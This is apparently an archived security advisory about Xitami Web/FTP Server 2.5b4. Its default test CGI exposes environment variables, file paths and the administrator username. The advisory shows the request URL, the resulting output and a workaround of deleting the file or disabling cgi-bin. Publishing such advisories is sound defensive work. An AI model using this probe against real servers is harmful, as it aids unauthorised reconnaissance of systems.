[ SOURCE: http://www.secureroot.com/security/advisories/9762084705.html ] Xitami Web/FTP Server security vulnerability (testcgi) ------------------------------------------------------------------------ SUMMARY Xitami web server default's installation of the CGI bin directory contains a test CGI that allows remote users to view information regarding the operating system and web server's directory. DETAILS Vulnerable systems: Xitami WEB/FTP release 2.5b4 Example: http://www.example.com/cgi-bin/testcgi will produce the following output: Environment Variables COMPUTERNAME = MYSERVER COMSPEC = C:\WINNT\system32\cmd.exe HOMEDRIVE = C: HOMEPATH = \ LOGONSERVER = \\MYSERVER NUMBER_OF_PROCESSORS = 1 OS = Windows_NT OS2LIBPATH = C:\WINNT\system32\os2\dll; PATH = C:\WINNT\system32;C:\WINNT PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0803 SYSTEMDRIVE = C: SYSTEMROOT = C:\WINNT TEMP = C:\TEMP TMP = C:\TEMP USERDOMAIN = MYSERVER USERNAME = Administrator USERPROFILE = C:\WINNT\Profiles\Administrator WINDIR = C:\WINNT HTTP_ACCEPT_CHARSET = iso-8859-1,*,utf-8 HTTP_ACCEPT_LANGUAGE = en HTTP_ACCEPT_ENCODING = gzip HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* HTTP_HOST = 127.0.0.1 HTTP_USER_AGENT = Mozilla/4.75 [en] (WinNT; U) HTTP_CONNECTION = Keep-Alive HTTP_CONTENT_LENGTH = 0 SERVER_SOFTWARE = Xitami SERVER_VERSION = 2.5b4 SERVER_NAME = 127.0.0.1 SERVER_URL = http://127.0.0.1/ SERVER_PORT = 0 SERVER_PROTOCOL = HTTP/1.1 SERVER_SECURITY = - GATEWAY_INTERFACE = CGI/1.1 REQUEST_METHOD = GET QUERY_METHOD = GET SCRIPT_PATH = cgi-bin SCRIPT_NAME = /cgi-bin/testcgi CONTENT_TYPE = CONTENT_LENGTH = 0 REMOTE_USER = - REMOTE_HOST = 127.0.0.1 REMOTE_ADDR = 127.0.0.1 PATH_INFO = PATH_TRANSLATED = C:/Xitami/webpages DOCUMENT_ROOT = C:/Xitami/webpages CGI_ROOT = C:/Xitami/cgi-bin CGI_URL = /cgi-bin CGI_STDIN = C:\TEMP\pipe0001.cgi CGI_STDOUT = C:\TEMP\pipe0001.cgo CGI_STDERR = cgierr.log Workaround: Delete testcgi.exe file, or disable the cgi-bin directory in Xitami Administration under CGI properties configuration menu. ADDITIONAL INFORMATION The information has been provided by zer0-logic.